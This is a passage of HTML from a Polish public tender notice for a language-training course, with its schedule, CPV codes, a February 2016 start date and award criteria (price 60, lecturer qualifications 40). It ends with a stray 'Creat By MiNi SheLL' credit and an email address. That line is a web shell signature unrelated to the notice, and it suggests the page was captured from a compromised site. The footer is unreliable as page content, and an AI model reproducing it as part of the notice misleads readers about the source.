Czwartek w godzinach 12.30 do 14.55 (3x45 min + 10 min przerwy)
Razem: 100 godzin szkoleniowych
Szczegółowy opis szkolenia dla części nr 4 znajduje się w załączniku nr 11d do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. przygotowanie fachowe lektorów - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com